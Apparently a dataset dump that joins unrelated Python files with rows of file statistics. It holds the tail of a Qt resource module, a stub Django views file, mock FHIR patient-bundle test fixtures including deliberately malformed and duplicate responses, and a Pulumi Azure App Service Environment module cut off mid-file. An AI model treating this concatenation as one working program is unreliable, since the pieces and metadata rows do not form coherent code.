\x00\x00\x0f\x50\x00\x00\x00\x00\x00\x01\x00\x00\xbb\x79\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x02\x7c\x00\x00\x00\x00\x00\x01\x00\x00\x1d\xaa\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x11\xfa\x00\x00\x00\x00\x00\x01\x00\x00\xdb\x52\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x05\x22\x00\x00\x00\x00\x00\x01\x00\x00\x40\xb5\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
\x00\x00\x03\xd2\x00\x00\x00\x00\x00\x01\x00\x00\x31\x5b\
\x00\x00\x01\x7b\x07\xd5\x1b\xe0\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
| 55.845117
| 129
| 0.723237
| 128,826
| 534,717
| 3.001638
| 0.002375
| 0.076527
| 0.041801
| 0.043663
| 0.97971
| 0.969966
| 0.962042
| 0.952709
| 0.947689
| 0.940482
| 0
| 0.425908
| 0.018069
| 534,717
| 9,574
| 130
| 55.85095
| 0.310566
| 0.000284
| 0
| 0.664574
| 0
| 0.793785
| 0.000002
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0.000209
| false
| 0
| 0.000105
| 0
| 0.000314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4a664dc4c2eb8363d314ea2c8ca4600ff5d41601
| 203
|
py
|
Python
|
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
cornucopia/views/tags.py
|
AlexandraAlter/django-cornucopia
|
1681ccbc5e98736e61f6afb1b78931dda9547486
|
[
"MIT"
] | null | null | null |
from django import http, views
class TagListView(views.View):
pass
class TagView(views.View):
pass
class TagAliasView(views.View):
pass
class TagImplicationView(views.View):
pass
| 11.277778
| 37
| 0.714286
| 25
| 203
| 5.8
| 0.48
| 0.248276
| 0.358621
| 0.372414
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.20197
| 203
| 17
| 38
| 11.941176
| 0.895062
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
4a85a092f03106ff913e0f5e95db9eae562313e9
| 17,062
|
py
|
Python
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 25
|
2017-12-10T00:48:31.000Z
|
2022-03-25T01:29:13.000Z
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 298
|
2017-12-05T05:53:32.000Z
|
2022-03-21T19:29:03.000Z
|
apps/fhir/server/tests/responses.py
|
dtisza1/bluebutton-web-server
|
6322f28d75bd9e00f8dc4b5988a0cd5f7c6c80cb
|
[
"Apache-2.0"
] | 31
|
2017-12-04T16:01:12.000Z
|
2021-09-26T22:34:55.000Z
|
# flake8: noqa
responses = {
"success": {
"status_code": 200,
"content": {
"resourceType":"Bundle",
"id":"389a548b-9c85-4491-9795-9306a957030b",
"meta":{
"lastUpdated":"2019-12-18T13:40:02.792-05:00"
},
"type":"searchset",
"total":1,
"link":[
{
"relation":"first",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"last",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"self",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/?_count=10&_format=application%2Fjson%2Bfhir&_id=-20000000002346&startIndex=0"
}
],
"entry":[
{
"resource":{
"resourceType":"Patient",
"id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}
]
},
},
"not_found": {
"status_code": 200,
"content": {
"resourceType":"Bundle",
"id":"389a548b-9c85-4491-9795-9306a957030b",
"meta":{
"lastUpdated":"2019-12-18T13:40:02.792-05:00"
},
"type":"searchset",
"total":0,
"link":[
{
"relation":"first",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"last",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"self",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/?_count=10&_format=application%2Fjson%2Bfhir&_id=-20000000002346&startIndex=0"
}
],
},
},
"error": {
"status_code": 500,
},
"duplicates": {
"status_code": 200,
"content": {
"resourceType":"Bundle",
"id":"389a548b-9c85-4491-9795-9306a957030b",
"meta":{
"lastUpdated":"2019-12-18T13:40:02.792-05:00"
},
"type":"searchset",
"total":2,
"link":[
{
"relation":"first",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"last",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"self",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/?_count=10&_format=application%2Fjson%2Bfhir&_id=-20000000002346&startIndex=0"
}
],
"entry":[
{
"resource":{
"resourceType":"Patient",
"id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}, {
"resource":{
"resourceType":"Patient",
"id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}
]
},
},
"malformed": {
"status_code": 200,
"content": {
"resourceType":"Bundle",
"id":"389a548b-9c85-4491-9795-9306a957030b",
"meta":{
"lastUpdated":"2019-12-18T13:40:02.792-05:00"
},
"type":"searchset",
"total":1,
"link":[
{
"relation":"first",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"last",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"self",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/?_count=10&_format=application%2Fjson%2Bfhir&_id=-20000000002346&startIndex=0"
}
],
"entry":[
{
"resource":{
"resourceType":"Patient",
"_id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}
]
},
},
"lying": {
"status_code": 200,
"content": {
"resourceType":"Bundle",
"id":"389a548b-9c85-4491-9795-9306a957030b",
"meta":{
"lastUpdated":"2019-12-18T13:40:02.792-05:00"
},
"type":"searchset",
"total":1,
"link":[
{
"relation":"first",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"last",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient?_count=10&startIndex=0&_id=-20000000002346"
},
{
"relation":"self",
"url":"https://sandbox.bluebutton.cms.gov/v1/fhir/Patient/?_count=10&_format=application%2Fjson%2Bfhir&_id=-20000000002346&startIndex=0"
}
],
"entry":[
{
"resource":{
"resourceType":"Patient",
"id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}, {
"resource":{
"resourceType":"Patient",
"id":"-20000000002346",
"extension":[
{
"url":"https://bluebutton.cms.gov/resources/variables/race",
"valueCoding":{
"system":"https://bluebutton.cms.gov/resources/variables/race",
"code":"1",
"display":"White"
}
}
],
"identifier":[
{
"system":"https://bluebutton.cms.gov/resources/variables/bene_id",
"value":"-20000000002346"
},
{
"system":"https://bluebutton.cms.gov/resources/identifier/mbi-hash",
"value":"98765432137efea543f4f370f96f1dbf01c3e3129041dba3ea43675987654321"
}
],
"name":[
{
"use":"usual",
"family":"Doe",
"given":[
"John",
"X"
]
}
],
"gender":"male",
"birthDate":"2000-06-01",
"address":[
{
"district":"999",
"state":"48",
"postalCode":"99999"
}
]
}
}
]
},
},
}
| 41.21256
| 156
| 0.302133
| 853
| 17,062
| 5.985932
| 0.114889
| 0.099295
| 0.122209
| 0.098707
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0.984724
| 0
| 0.154385
| 0.581643
| 17,062
| 413
| 157
| 41.312349
| 0.560941
| 0.000703
| 0
| 0.625304
| 0
| 0.036496
| 0.33171
| 0.041588
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78dc9e542ad8932b9c4f5e353298af0c78dff6d5
| 42,438
|
py
|
Python
|
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure/appservice/environment_v3.py
|
roderik/pulumi-azure
|
f6d0c058d6f9111a709bc5f1515d1638f9d615f0
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['EnvironmentV3Args', 'EnvironmentV3']
@pulumi.input_type
class EnvironmentV3Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
subnet_id: pulumi.Input[str],
allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]] = None,
dedicated_host_count: Optional[pulumi.Input[int]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
zone_redundant: Optional[pulumi.Input[bool]] = None):
"""
The set of arguments for constructing a EnvironmentV3 resource.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "subnet_id", subnet_id)
if allow_new_private_endpoint_connections is not None:
pulumi.set(__self__, "allow_new_private_endpoint_connections", allow_new_private_endpoint_connections)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if dedicated_host_count is not None:
pulumi.set(__self__, "dedicated_host_count", dedicated_host_count)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if name is not None:
pulumi.set(__self__, "name", name)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Input[str]:
"""
The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="allowNewPrivateEndpointConnections")
def allow_new_private_endpoint_connections(self) -> Optional[pulumi.Input[bool]]:
"""
Should new Private Endpoint Connections be allowed. Defaults to `true`.
"""
return pulumi.get(self, "allow_new_private_endpoint_connections")
@allow_new_private_endpoint_connections.setter
def allow_new_private_endpoint_connections(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_new_private_endpoint_connections", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="dedicatedHostCount")
def dedicated_host_count(self) -> Optional[pulumi.Input[int]]:
"""
This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "dedicated_host_count")
@dedicated_host_count.setter
def dedicated_host_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "dedicated_host_count", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="zoneRedundant")
def zone_redundant(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "zone_redundant")
@zone_redundant.setter
def zone_redundant(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "zone_redundant", value)
@pulumi.input_type
class _EnvironmentV3State:
def __init__(__self__, *,
allow_new_private_endpoint_connections: Optional[pulumi.Input[bool]] = None,
cluster_settings: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]] = None,
dedicated_host_count: Optional[pulumi.Input[int]] = None,
dns_suffix: Optional[pulumi.Input[str]] = None,
external_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
inbound_network_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]] = None,
internal_inbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
internal_load_balancing_mode: Optional[pulumi.Input[str]] = None,
ip_ssl_address_count: Optional[pulumi.Input[int]] = None,
linux_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
pricing_tier: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
windows_outbound_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
zone_redundant: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering EnvironmentV3 resources.
:param pulumi.Input[bool] allow_new_private_endpoint_connections: Should new Private Endpoint Connections be allowed. Defaults to `true`.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]] cluster_settings: Zero or more `cluster_setting` blocks as defined below.
:param pulumi.Input[int] dedicated_host_count: This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
:param pulumi.Input[str] dns_suffix: the DNS suffix for this App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input[str]]] external_inbound_ip_addresses: The external outbound IP addresses of the App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]] inbound_network_dependencies: An Inbound Network Dependencies block as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] internal_inbound_ip_addresses: The internal outbound IP addresses of the App Service Environment V3.
:param pulumi.Input[str] internal_load_balancing_mode: Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
:param pulumi.Input[int] ip_ssl_address_count: The number of IP SSL addresses reserved for the App Service Environment V3.
:param pulumi.Input[Sequence[pulumi.Input[str]]] linux_outbound_ip_addresses: Outbound addresses of Linux based Apps in this App Service Environment V3
:param pulumi.Input[str] location: The location where the App Service Environment exists.
:param pulumi.Input[str] name: The name of the App Service Environment. Changing this forces a new resource to be created.
:param pulumi.Input[str] pricing_tier: Pricing tier for the front end instances.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the App Service Environment exists. Defaults to the Resource Group of the Subnet (specified by `subnet_id`).
:param pulumi.Input[str] subnet_id: The ID of the Subnet which the App Service Environment should be connected to. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] windows_outbound_ip_addresses: Outbound addresses of Windows based Apps in this App Service Environment V3.
"""
if allow_new_private_endpoint_connections is not None:
pulumi.set(__self__, "allow_new_private_endpoint_connections", allow_new_private_endpoint_connections)
if cluster_settings is not None:
pulumi.set(__self__, "cluster_settings", cluster_settings)
if dedicated_host_count is not None:
pulumi.set(__self__, "dedicated_host_count", dedicated_host_count)
if dns_suffix is not None:
pulumi.set(__self__, "dns_suffix", dns_suffix)
if external_inbound_ip_addresses is not None:
pulumi.set(__self__, "external_inbound_ip_addresses", external_inbound_ip_addresses)
if inbound_network_dependencies is not None:
pulumi.set(__self__, "inbound_network_dependencies", inbound_network_dependencies)
if internal_inbound_ip_addresses is not None:
pulumi.set(__self__, "internal_inbound_ip_addresses", internal_inbound_ip_addresses)
if internal_load_balancing_mode is not None:
pulumi.set(__self__, "internal_load_balancing_mode", internal_load_balancing_mode)
if ip_ssl_address_count is not None:
pulumi.set(__self__, "ip_ssl_address_count", ip_ssl_address_count)
if linux_outbound_ip_addresses is not None:
pulumi.set(__self__, "linux_outbound_ip_addresses", linux_outbound_ip_addresses)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if pricing_tier is not None:
pulumi.set(__self__, "pricing_tier", pricing_tier)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if windows_outbound_ip_addresses is not None:
pulumi.set(__self__, "windows_outbound_ip_addresses", windows_outbound_ip_addresses)
if zone_redundant is not None:
pulumi.set(__self__, "zone_redundant", zone_redundant)
@property
@pulumi.getter(name="allowNewPrivateEndpointConnections")
def allow_new_private_endpoint_connections(self) -> Optional[pulumi.Input[bool]]:
"""
Should new Private Endpoint Connections be allowed. Defaults to `true`.
"""
return pulumi.get(self, "allow_new_private_endpoint_connections")
@allow_new_private_endpoint_connections.setter
def allow_new_private_endpoint_connections(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_new_private_endpoint_connections", value)
@property
@pulumi.getter(name="clusterSettings")
def cluster_settings(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]:
"""
Zero or more `cluster_setting` blocks as defined below.
"""
return pulumi.get(self, "cluster_settings")
@cluster_settings.setter
def cluster_settings(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3ClusterSettingArgs']]]]):
pulumi.set(self, "cluster_settings", value)
@property
@pulumi.getter(name="dedicatedHostCount")
def dedicated_host_count(self) -> Optional[pulumi.Input[int]]:
"""
This ASEv3 should use dedicated Hosts. Possible vales are `2`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "dedicated_host_count")
@dedicated_host_count.setter
def dedicated_host_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "dedicated_host_count", value)
@property
@pulumi.getter(name="dnsSuffix")
def dns_suffix(self) -> Optional[pulumi.Input[str]]:
"""
the DNS suffix for this App Service Environment V3.
"""
return pulumi.get(self, "dns_suffix")
@dns_suffix.setter
def dns_suffix(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dns_suffix", value)
@property
@pulumi.getter(name="externalInboundIpAddresses")
def external_inbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The external outbound IP addresses of the App Service Environment V3.
"""
return pulumi.get(self, "external_inbound_ip_addresses")
@external_inbound_ip_addresses.setter
def external_inbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "external_inbound_ip_addresses", value)
@property
@pulumi.getter(name="inboundNetworkDependencies")
def inbound_network_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]]:
"""
An Inbound Network Dependencies block as defined below.
"""
return pulumi.get(self, "inbound_network_dependencies")
@inbound_network_dependencies.setter
def inbound_network_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['EnvironmentV3InboundNetworkDependencyArgs']]]]):
pulumi.set(self, "inbound_network_dependencies", value)
@property
@pulumi.getter(name="internalInboundIpAddresses")
def internal_inbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
The internal outbound IP addresses of the App Service Environment V3.
"""
return pulumi.get(self, "internal_inbound_ip_addresses")
@internal_inbound_ip_addresses.setter
def internal_inbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "internal_inbound_ip_addresses", value)
@property
@pulumi.getter(name="internalLoadBalancingMode")
def internal_load_balancing_mode(self) -> Optional[pulumi.Input[str]]:
"""
Specifies which endpoints to serve internally in the Virtual Network for the App Service Environment. Possible values are `None` (for an External VIP Type), and `"Web, Publishing"` (for an Internal VIP Type). Defaults to `None`.
"""
return pulumi.get(self, "internal_load_balancing_mode")
@internal_load_balancing_mode.setter
def internal_load_balancing_mode(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "internal_load_balancing_mode", value)
@property
@pulumi.getter(name="ipSslAddressCount")
def ip_ssl_address_count(self) -> Optional[pulumi.Input[int]]:
"""
The number of IP SSL addresses reserved for the App Service Environment V3.
"""
return pulumi.get(self, "ip_ssl_address_count")
@ip_ssl_address_count.setter
def ip_ssl_address_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ip_ssl_address_count", value)
@property
@pulumi.getter(name="linuxOutboundIpAddresses")
def linux_outbound_ip_addresses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Outbound addresses of Linux based Apps in this App Service Environment V3
"""
return pulumi.get(self, "linux_outbound_ip_addresses")
@linux_outbound_ip_addresses.setter
def linux_outbound_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "linux_outbound_ip_addresses", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The location where the App Service Environment exists.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the App Service Environment. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="pricingTier")
def pricing_tier(self) -> Optional[pulumi.Input[str]]:
"""
Pricing tier for the front end instances.
"""
